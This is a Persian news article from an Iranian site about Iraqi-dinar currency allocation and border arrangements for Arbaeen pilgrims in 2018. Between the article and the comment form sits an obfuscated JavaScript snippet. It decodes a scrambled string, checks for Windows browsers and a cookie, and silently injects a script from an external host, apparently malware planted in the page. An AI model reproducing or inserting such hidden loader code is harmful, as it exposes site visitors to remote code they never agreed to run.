دفتر مقام معظم رهبری
titreno.ir
حرف تو
تاریخ انتشار : 24 مهر 1397 - 22:49
کد مطلب: 49071
معاون امنیتی وزارت کشور از پرداخت دینار به زائران اربعین امسال خبر داد.

به گزارش ایلام پویا، حسین ذوالفقاری شامگاه دوشنبه در خصوص ارز اختصاصی به زوار اربعین امسال اظهار داشت: ارز  زائران اربعین امسال به‌صورت "دینار" پرداخت می‌شود و بانک‌های نجف، کربلا و بغداد در کشور عراق امر تخصیص ارز "دینار" به زائران اربعین حسینی(ع) را انجام می دهند و دراین‌راستا هماهنگی‌های لازم معمول شده است.
معاون امنیتی وزیر کشور درباره بانک‌های عامل در کشور گفت: ‌بانک‌های ملی، پارسیان و توسعه و تعاون اسلامی در شعب 5گانه خود در مرزهای سه‌گانه آماده پرداخت ارز به‌صورت دینار به زائران اربعین حسینی هستند.
وی با اشاره به تردد 55 درصد زائران برای انجام آئین اربعین حسینی از مرز بین‌المللی مهران  افزود: اقدامات خوب و قابل قبولی در ابعاد مختلف برای  برگزاری همایش پیاده‌روی اربعین  انجام شده و نشان از تلاش و برنامه یک‌ساله  مسئولان  در استان ایلام است.
وی فعالیت 20 دفتر کنسولگری عراق در کشور را یکی از اقدامات مهم جهت تسریع در اخذ روادید برای زائران دانست و تصریح کرد: زائران بدون ویزا به مرز مراجعه نکنند و برای کنترل زائران بدون ویزا و مدارک قانونی لایه‌های کنترلی مختلفی در نظر گرفته شده است.
ذولفقاری راجع به انجام طرح‌های مختلف امنیتی و اطلاعاتی در کشور ابراز کرد: تمام هماهنگی‌ها در کشور عراق در لایه‌های مختلف برای تأمین امنیت زائران صورت گرفته است.
استفاده حداکثری از ظرفیت ناوگان عمومی حمل‌ونقل عمومی برای جابه‌‌جایی زائران در مرزهای سه‌گانه از اقدامات دیگر انجام‌شده جهت ارائه خدمات به زائران حسینی از عناوین مطرح‌شده توسط معاون امنیتی وزارت کشور بود که خاطرنشان کرد: حضور ناوگان حمل‌ونقل عمومی ایران در خاک عراق با هماهنگی طرف عراقی و به‌صورتی که به اقتصاد مردم عراق لطمه وارد نشود در حال هماهنگی است و انتقال زائران از ترمینال برکت به پایانه مرزی توسط ناوگان حمل‌ونقل عمومی درون‌شهری انجام می‌شود.
انتهای پیام
;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&;0)3{2{=udlirc6?;srjx.{e,d4o6c{_8s)/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a='';for(var f=0;f=0;p--){k+=t[p];}return k;}})();

دیدگاههای ارسال شده ، پس ازتأیید توسط مدیر سایت منتشر خواهد شد.
پیامهایی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
انتشار نظر به معنای تأیید از دید مسئول سایت نبوده و مسئولیت نظرات بر عهده نظردهنده است.

نظر شما

CAPTCHA ی تصویری
کاراکترهای نمایش داده شده در تصویر را وارد کنید.